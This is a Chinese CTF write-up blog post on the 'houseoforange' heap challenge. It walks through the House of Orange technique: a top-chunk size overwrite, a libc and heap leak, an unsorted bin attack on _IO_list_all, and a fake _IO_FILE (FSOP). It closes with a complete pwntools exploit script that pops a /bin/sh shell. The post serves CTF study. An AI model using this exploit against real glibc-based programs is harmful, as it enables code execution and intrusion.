攻防世界 进阶 houseoforange

最新推荐文章于 2023-02-10 11:27:25 发布
最新推荐文章于 2023-02-10 11:27:25 发布
阅读量666 收藏 5
点赞数 3
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/114649586
版权

就是house of orange 跟题目名字一摸一样。

保护

在这里插入图片描述绿油油

在这里插入图片描述
build
在这里插入图片描述备注一写顿时简单了起来。

结构分析一下。

在这里插入图片描述那orange的颜色要么就是56746,要么就是0到6.

see

在这里插入图片描述然后呢这里56746跟30到36输出是不一样的。

upgrade

在这里插入图片描述

房子只能申请三个,改也只能改三次。
对修改的大小没有限制,所以就会有堆溢出。
那问题来了,怎么利用?

他没有free函数,这就是标准的house of orange

我们总体的思路是这样的。

创建第一个house,修改top_chunk的size
创建第二个house,触发sysmalloc中的_int_free
创建第三个house,泄露libc和heap的地址
创建第四个house,触发异常

一步一步来,首先说创建第一个house并且修改top_chunk的size。

通过堆溢出,修改top chunk的大小,然后分配一个大小大于top chunk大小的chunk,所以 旧top chunk就会被free掉,进入unsorted bin中,将其称为old top chunk 。
但是top chunk的size不能随便改,因为malloc中对它的大小有检查。

assert ((old_top == initial_top (av) && old_size == 0) ||
          ((unsigned long) (old_size) >= MINSIZE &&
           prev_inuse (old_top) &&
           ((unsigned long) old_end & (pagesize - 1)) == 0));

  /* Precondition: not enough current space to satisfy nb request */
  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));

看上去有些不好理解,总结起来就四点。

    大于MINSIZE(0X10)
    小于所需的大小 + MINSIZE
    prev inuse位设置为1
    old_top + oldsize的值是页对齐的

build(0x30,'a'*8,123,1)
payload = 'a'*0x30 + p64(0) + p64(0x21) +'a'*16+ p64(0)+ p64(0xf81)
upgrade(len(payload),payload,123,2)

第二步就是说我们让那个topchunk挂到unsorted bin中,那么我们就需要再次申请一个chunk,大小要大于刚刚的top chunk。但是要注意不能大于malloc的分配阈值,也就是mp_.mmap_threshold,否则的话会去调用mmap申请空间,会申请在libc上面。

在这里插入图片描述

build(0x1000,'b',123,1)
build(0x400,'a'*8,123,1)

第三步就需要我们去泄露地址。old chunk挂入unsorted bin中的时候我们可以去泄露libc的地址,申请回来泄露就好了,剩下的部分会进入large bin,我们再申请回来再泄露,就可以知道heap的地址。

see()
r.recvuntil("a"*8)
leak = u64(r.recv(6).ljust(8,'\x00'))
libc_base = leak -0x3c5188
print "leak -->[%s]"%hex(leak)
print "libc base address -->[%s]"%hex(libc_base)
#malloc largechunk again
#leak heap_base
upgrade(0x400,'a'*16,123,1)
see()
r.recvuntil('a'*16)
leak_heap = u64(r.recv(6).ljust(8,'\x00'))
heap_base = leak_heap - 0xe0
print "leak_heap -->[%s]"%hex(leak_heap)
print "heap_base -->[%s]"%hex(heap_base)

第四步是我们的第二个关键部分,前一个关键部分在于怎么去制造free的chunk来让我们去利用,后一个部分就是我们怎么通过攻击_IO_FILE来拿到我们的shell

首先我们想说一下要用到的原理。
当glibc检测到一些内存崩溃问题时,他会进入到Abort routine(中止过程),他会把所有的streams送到第一阶段中(stage one).换句话说就是,他会进入_IO_flush_all_lockp函数,并会使用_IO_FILE对象,而_IO_FILE对象会在_IO_list_all中被调用.如果我们能够重写这些指针并且伪造那个对象,那么我们就能拿到程序的控制权了。

所以我们可以想办法去伪造一个_IO_FILE的对象,并且把它挂在chain链中,然后触发_IO_flush_all_lockp来刷新缓冲区,当然此时我们的IO_overflow函数已经随便覆盖,buf指针也被随便覆盖,我们就可以去拿到shell
这种利用方法又被称为FSOP。

那么问题有来了,我们怎么通过一些已有的条件,去伪造结构体,然后把结构体挂在chain链上?
我们现在有的就是首先可以有一些控制的chunk,所以考虑可以直接把它伪造成fake chunk,我们又需要覆写现有的IO_FILE的chain指针,指向我们的文件,可以利用堆溢出,unsorted bin 来写地址的方法只有unsorted bin attack,所以我们大体的思路也就有了。

那么我们现在的问题就是首先通过unsorted bin attack来让chain的地方写上我们的chunk地址。
我们可以将bk指针覆盖为&IO_list_all -0x10,因此IO_list_all被重写为unsortbin-0x10。尤其要注意得是,_IO_list_all 并不是一个描述文件的结构,而是它指向了一个可以描述文件的结构体头部,通常它指向 IO_2_1_stderr 。

要将chunk的大小设置成0x60,0x60属于smallbin的范围了,所以此时的old_top被加入到smallbin[4]的链表中。IO_FILE偏移0x60的字段是struct _IO_marker *_markers,偏移0x68的字段是struct _IO_FILE *_chain。而这两个的值恰恰是old_top的起始地址。所以现在chain后面就连着个我们的chunk,我们就可以对他进行伪造,随便造,然后就可以了。

当然我们要注意是有检查的。溢出时即可在old top chunk处伪造好fake _IO_FILE结构,偏移0x20处为_IO_write_base,偏移0x28处为_IO_write_ptr,偏移0xc8处为_mode,偏移0xd8处为ptr_vtable

1._mode<=0
2._IO_write_base<IO_write_ptr

最后利用的是报错。
old_top的size被改写为0x60,本次分配的时候,会先从unsortbin中取下old_top,加入到smallbin[4],同时,unsortbin.bk也被改写成了&IO_list_all-0x10,所以此时的victim->size=0那么不会通过校验,进入malloc_printerr,触发异常。

具体一点怎么说呢,就是在我们unsorted bin attack结束之后,我们想一下,此时unsorted bin中会有什么,他会把我们之前的bck链进去呀,当我们再次去申请chunk的时候,一进来就会先对undorted里面的chunk做检查。

 while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
        {
          bck = victim->bk;
          if (__builtin_expect (victim->size <= 2 * SIZE_SZ, 0)
              || __builtin_expect (victim->size > av->system_mem, 0))
            malloc_printerr (check_action, "malloc(): memory corruption",
                             chunk2mem (victim), av);
          size = chunksize (victim);

我们此时的chunk的size位是0,因为刚刚bck是&_IO_list_all - 0x10, 所以size的地方是0,就会在if中的那个检查挂掉,然后从而完成攻击。

exp

payload = 'a'*0x400
payload += p64(0) + p64(0x21) + 'a'*0x10
#old_top_chunk=_IO_FILE
fake_file = '/bin/sh\x00' + p64(0x61)
fake_file += p64(0) + p64(_IO_list_all - 0x10)#unsorted bin attack
fake_file += p64(0) + p64(1) 
#bypass check
#_IO_FILE fp
#fp->_IO_write_base < fp->_IO_write_ptr (offset *(0x20)<*(0x28))
#fp->_mode<=0   (offset *(0xc8)<=0)
fake_file = fake_file.ljust(0xc0,'\x00')
payload += fake_file
payload += p64(0)*3
#0xc0+0x18=0xd8
#_IO_jump_t *ptr_vtable
#file_adr+0xd8=&ptr_vtable
#vtable[3]=overflow_adr
#gdb.attach(p)
payload += p64(heap_base + 0x5f0)#ptr_vtable
payload += p64(0)*3#vtable
payload += p64(system)#vtable[3]
upgrade(0x800,payload,123,1)
r.recv()
r.sendline('1')
#malloc size<=2*SIZE_SZ
#malloc(0x10) -> malloc_printerr ->overflow(IO_list_all) ->system('/bin/sh')

所以整个的exp

from pwn import *
from LibcSearcher import *


#r = process("./hitcon_2016_houseoforange")

context.log_level = 'debug'

elf = ELF("./140")
libc = ELF('./64/libc-2.23.so')

def add(size, content, price, color):
	r.recvuntil("Your choice : ")
	r.sendline('1')
	r.recvuntil("Length of name :")
	r.sendline(str(size))
	r.recvuntil("Name :")
	r.send(content)
	r.recvuntil("Price of Orange:")
	r.sendline(str(price))
	r.recvuntil("Color of Orange:")	#1-7
	r.sendline(str(color))


def show():
	r.recvuntil("Your choice : ")
	r.sendline('2')

def edit(size, content, price, color):
	r.recvuntil("Your choice : ")
	r.sendline('3')
	r.recvuntil("Length of name :")
	r.sendline(str(size))
	r.recvuntil("Name:")
	r.send(content)
	r.recvuntil("Price of Orange:")
	r.sendline(str(price))
	r.recvuntil("Color of Orange:")	#1-7
	r.sendline(str(color))



add(0x30,'aaaa\n',0x1234,0xddaa)
payload = 'a' * 0x30 +p64(0) + p64(0x21) + p32(666) + p32(0xddaa) + p64(0) * 2 + p64(0xf81)
edit(len(payload), payload, 666, 0xddaa)

add(0x1000, 'a\n',0x1234, 0xddaa)
add(0x400, 'a' * 8, 199, 2)
show()
r.recvuntil('a'*8)
malloc_hook = u64(r.recvuntil('\x7f').ljust(8, '\x00')) - 0x668 - 0x10
success('malloc_hook = '+hex(malloc_hook))
libc.address = malloc_hook - libc.symbols['__malloc_hook']
io_list_all = libc.symbols['_IO_list_all']
system = libc.symbols['system']

payload = 'b' * 0x10
edit(0x10, payload, 199, 2)
show()
r.recvuntil('b'*0x10)
heap = u64(r.recvuntil('\n').strip().ljust(8, '\x00'))
heap_base = heap - 0xE0
success('heap = '+hex(heap))

#pause()
payload = 'a' * 0x400 + p64(0) + p64(0x21) + p32(666) + p32(0xddaa) + p64(0)
fake_file = '/bin/sh\x00'+p64(0x61)#to small bin
fake_file += p64(0)+p64(io_list_all-0x10)
fake_file += p64(0) + p64(1)#_IO_write_base < _IO_write_ptr
fake_file = fake_file.ljust(0xc0,'\x00')
fake_file += p64(0) * 3
fake_file += p64(heap_base+0x5E8) #vtable ptr
fake_file += p64(0) * 2
fake_file += p64(system)
payload += fake_file
edit(len(payload), payload, 666, 2)
#pause()
r.recvuntil("Your choice : ")
r.sendline('1')

r.interactive()
yongbaoii
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
houseoforange_hitcon_2016(House of orange, unsorted bin attack,FSOP)
weixin_44145820的博客
04-27 1425
目录题目分析漏洞利用Exp 题目分析 只有添加,显示,编辑三个功能,没有删除 添加函数,最多只能添加四次,每次添加会依次执行malloc(0x10),malloc(name_size),calloc(8) House结构体如下 在编辑函数中,可以进行堆溢出,因为House没有把name的size保存下来 编辑次数最多为3 漏洞利用 Exp ...
House of orange
seaaseesa的博客
02-14 1705
House of orange因一道同名的题而来,它是在程序没有调用free函数的情况下利用其它漏洞结合IO_FILE来达到利用。 首先利用漏洞修改top chunk的size,然后申请一个比size大的堆,满足一定条件,这个top chunk就会被释放到unsorted bin里。 利用unsorted bin attack,将__IO_list_all指针改写为unsorted bin的头...
house of orange
inquisiter
01-20 417
house of orange 本次笔记基于看雪 看雪CTF.TSRC 2018 团队赛 第十四题 这个东西好像在新版的libc.so中不太好用,不过有点意思记录下吧。 house of orange 1.分配一个堆块 2.溢出topchunk修改size 3.申请超出size的堆,topchunk进入unsorted bin。 4.申请小于size的堆,old_top分为两块。 5. p...
House Of Orange
qq_45595732的博客
11-26 1028
House Of Orange 本质:Unsorted bin attack 和 FSOP造成的组合漏洞利用方式。 House of orange源于一道题目,有时候只用到free top chunk的题目也会被归入该类中。 glibc版本<=2.23情况 特点:不需要free操作 核心原理: 1,获取unsorted bin ​ 在_int_malloc函数中,会依次检验 fastbin、small bins、unsorted bin、large bins 是否可以满足分配要求,因为尺寸问
16.house_of_orange
06-10 303
源代码 1 #include <stdio.h> 2 #include <stdlib.h> 3 #include <string.h> 4 5 /* 6 The House of Orange uses an overflow in the heap to corrupt the _IO_list_all...
无线网络安全攻防实战进阶
01-28
无线网络安全攻防实战进阶,无线网络安全攻防实战进阶,有问题加q1186351245
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界Fakezip杂项
11-20
攻防世界Fakezip杂项】是一道网络安全领域中的挑战,属于攻防世界的Misc类问题。Misc( Miscellaneous)通常指的是涉及多种技术、需要综合运用知识的题目,这道题目的核心在于理解和处理压缩文件,特别是涉及到...
【八芒星计划】 House of Orange
carol2358的博客
09-02 375
文章目录前言CISCN2020 nofree总结 前言 House of Orange是一种用来应对heap题中没有free的情况的方法,通过把top chunk的size改小,然后申请一个大于topchunk的size的chunk来把旧的top chunk放入bin中(可以是fastbin,也可以是unsortedbin) 使用条件有: ①可以修改topchunk的size ②伪造的 size 必须要对齐到内存页 ③size 要大于 MINSIZE(0x10) ④size 要小于之后申请的 chunk.
CTFHub[技能树]-----House of orange
最新发布
saulgoodman的博客
02-10 206
House of orange也是我第一次学,边学边做题,来来回回折腾了8小时,代码检查了一遍又一遍,没问题但总是打不成功,最后百度查了一下这个是概率成功,我哭了。白白浪费了这么久时间。
the house of orange解析
小强的博客
11-24 2215
先以这个最简单的例子举例: https://github.com/shellphish/how2heap/blob/master/house_of_orange.c 编译生成ELF文件(64位) p1 = malloc(0x400-16); 每次创建堆都是从top chunk上切割堆块,由于top chunk默认是0x21000,因为我们已经申请了0x400大小的堆,所以此时to
Hitcon CTF 2016 - house of orange 做题笔记
fa1c4的blog
03-31 1117
前言 深入学习pwn的高级堆利用方法, house of orange是绕不开的难关 之前已经接触了house系列题目, 不过由于心理压迫感, 所以迟迟没有开始调试house的漏洞 现在避无可避了, 于是准备集中精力突破掉house of orange 想要打过BOSS得先升级, 但是为了升级必须先打过BOSS (雾~ 分析过程 CTFhub和BUUCTF的题目有差别, 就按BUU来打吧 漏洞利用 总结 参考 ...
攻防世界PWN之Poisonous_Milk(认清vector的结构+house of orange利用)
seaaseesa的博客
02-19 1421
Poisonous_Milk 首先,我们检查一下程序的保护机制 然后,我们用IDA分析一下,发现是c++写的程序,看起来复杂了很多,这些一大堆,作用只是打印菜单,那么我们把这个函数重命名为menu。 接下来,我们进入下一个函数查看,应该就是主功能区了。 为了便于分析,我们给函数重命名了 创建内容的函数里,最多输入86个字符 实际上只能输入85个字符,并且最后一个会被...
cscctf_2019_final_childrenheap(house of orange)
seaaseesa的博客
04-30 658
cscctf_2019_final_childrenheap 首先,检查一下程序的保护机制 然后用IDA分析一下 Update功能存在一个null off by one 禁用了fastbin,因此不能fastbin attack。那么可以利用house of orange或者large bin attack,个人认为house of orange较为简单一些。 利用null ...
house of orange学习报告
qq_35467337的博客
03-08 811
house of orangehouse of orange 不是什么梗,而是一道题目的名字,记录下hitcon 2016ctf house of orange
houseoforange_hitcon_2016
z1r0的博客
03-09 491
houseoforange_hitcon_2016 查看保护 这一题目就是使用house of orange + FSOP来解决 在edit的时候会让用户输入size,这里有一个堆溢出(笔者认为这一题还有一个考点就是逆清楚这个程序,自己增加结构体 这是笔者加的两个结构体,看成这样就行 struct Data{ Info *info; char *name } struct Info{ int price; int color; } 加了这个之后改一下堆块的类型就可以更快的清楚这个程序的结构。 回归
堆溢出-House of orange 学习笔记(看雪论坛)
happylzs2008的专栏
01-07 885
https://www.jianshu.com/p/4b0a73f321f9 前几天把House of orange重新学习了一下,比照着glibc malloc的源码好好分析了一下,希望做到真正做到知其然亦知其所以然,其中所做的笔记如下,可能描述上有点乱,大家将就着看一下吧。同时,我也发在了我个人博客上面 (http://blog.leanote.com/simp1e), 如果有错误的地方,...
攻防世界序列化漏洞详解与利用
"攻防世界序列化问题详解" 在网络安全领域,尤其是CTF(Capture The Flag)挑战中,序列化和反序列化是常见的漏洞利用点。本篇内容主要聚焦于攻防世界平台中涉及的序列化问题,通过一道具体的题目来深入解析这一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值